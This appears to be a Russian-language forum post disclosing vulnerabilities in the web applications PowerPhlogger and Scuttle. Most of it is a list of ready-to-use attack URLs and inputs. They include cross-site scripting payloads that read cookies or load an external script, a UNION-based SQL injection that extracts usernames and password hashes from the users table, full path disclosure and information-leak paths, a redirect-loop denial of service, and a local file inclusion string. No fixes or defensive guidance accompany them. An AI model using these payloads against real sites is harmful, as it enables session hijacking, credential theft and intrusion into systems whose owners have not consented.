PowerPhlogger
Уязвимости выкладываю в порядке мною нахождения ихXSS:
Post-запрос на странице http://site/dspLogs.php
Код:
"><script>alert(document.cookie)</script>
XSS:
Код:
http://site/dspLogs.php?S_hostname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_referer=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_agent=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_res=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_color=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_online=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_mp=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Также нашел интересные мета-теги:
Код:
<meta name="PHP Version" content="..." />
<meta name="MYSQL Version" content="..." />
Странная ксс:
На странице http://site/dspStats.php?edit=mp в логах посещений фильтруется информация про страницы сайта,если счетчик установленный на индексной странице то можно указать код в качестве адреса страницы)
Код:
http:/site/<script>alert(document.cookie)</script>
Вобщем так
Код:
http://site/dspStats.php?edit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Full path disclosure:
Код:
http://site/include/edCss.inc.php
http://site/include/foot.inc.php
http://site/include/get_csscolors.inc.php
http://site/include/head.inc.php
http://site/include/head_stuff.inc.php
http://site/include/loglist.inc.php
http://site/include/pphlogger_send.inc.php
http://site/modules/usercreate.php
http://site/modules/htmlMimeMail.php
http://site/modules/img_vis_per_hour.mod.php
http://site/edit_user.php
http://site/main-dummy.php
http://site/main.php
http://site/modules/htmlMimeMail.php
http://site/modules/img_vis_per_hour.mod.php
http://site/modules/usercreate.php
Еще XSS(найденые мною давно):
Post запрос на странице http://site/edUserprofile.php (возможны как Get так и Post запросы)
Код:
</textarea><script>alert(document.cookie)</script>
Код:
"><script>alert(document.cookie)</script>
Код:
"><script src=http://site.com
XSS:
Код:
http://site/edCss.php?css_str=12%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=edit
SQL Injection:
Код:
http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit
DoS:
http://site/newaccount_self.php
Скрипт редеректит сам себя.Mozilla автомаматический останавливает процесс,а вот ИЕ-нет.Поэтому если клиент,который обращается к скрипту сам не остановит редирект(например какой-то бот поисковых систем) то создается большая нагрузка на сервер.
Information Leakage:
http://site/main_location.inc
XSS:
Код:
http://site/dspLogs.php/%22%3E%3Cscript%20src=script.js%20
Код:
http://site/dspStats.php/%22%3E%3Cscript%20src=script.js%20
Код:
http://site/edCss.php/%22%3E%3Cscript%20src=script.js%20
Scuttle
Код:
http://site/bookmarks/%3CBODY%20onload=alert(document.cookie)%3E
Код:
http://site/?sort=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Вводим в поиске следующий пост запрос
Код:
</textarea><script>alert(document.cookie)</script>
Local File Inclusion:
Код:
http://site.com/help/syntax.html?la=/../query